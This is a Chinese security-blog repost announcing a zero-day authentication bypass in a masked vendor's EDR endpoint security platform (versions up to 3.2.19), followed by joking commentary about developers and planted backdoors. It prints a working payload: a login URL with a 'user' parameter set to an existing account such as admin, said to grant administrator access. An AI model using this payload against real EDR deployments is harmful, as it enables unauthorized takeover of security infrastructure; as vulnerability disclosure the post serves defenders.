记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

又来个0day,建议杀个开发祭天吧!

2020-08-20 10:56


漏洞编号: 暂无
漏洞名称: 某信服 EDR 任意用户登录漏洞
影响范围: EDR  <= v3.2.19
漏洞描述:
终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。


漏洞细节:


payload: https://ip/ui/login.php?user= 用户名随便写

例如: https://123.123.123.123:5000/ui/login.php?user=admin

只要用户名存在,比如管理员


如下图:
深X服是一家专注于企业级安全、云计算及IT基础设施的产品和服务供应商,拥有智安全、云计算和新IT三大业务品牌,致力于让用户的IT更简单、更安全、更有价值。


这是一个安全产品呀,怎么能有如何低级的漏洞呢?如果不杀个开发祭天,我都觉得是红队派过去卧底留的后门。

蓝队群里有人问我一个问题,我也回答不了,求解答!
给厂商开发程序的那个人如果开发的时候故意留一堆漏洞,然后等护网的时候突然提前离职,然后加入红队参与护网 上来直接放大招这样算不算作弊?


[参考链接]

https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage


推荐文章++++

*上来直接放0day大招,一天给一个月的活干完了!

*朋友圈惊现收二手源码,0day换不锈钢脸盆

*影响上亿台设备|被供应链放大的19个0Day



知识来源: https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650477380&idx=2&sn=359299757c135546142295eaa75fe512&chksm=83ba76a0b4cdffb6e48150d7337d7aac9713e445abdde7c08bffcdf18ce0935bb2f857aaddd6&scene=126&

阅读:12775 | 评论:0 | 标签:0day

想收藏或者和大家分享这篇好文章→复制链接地址

“又来个0day,建议杀个开发祭天吧!”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云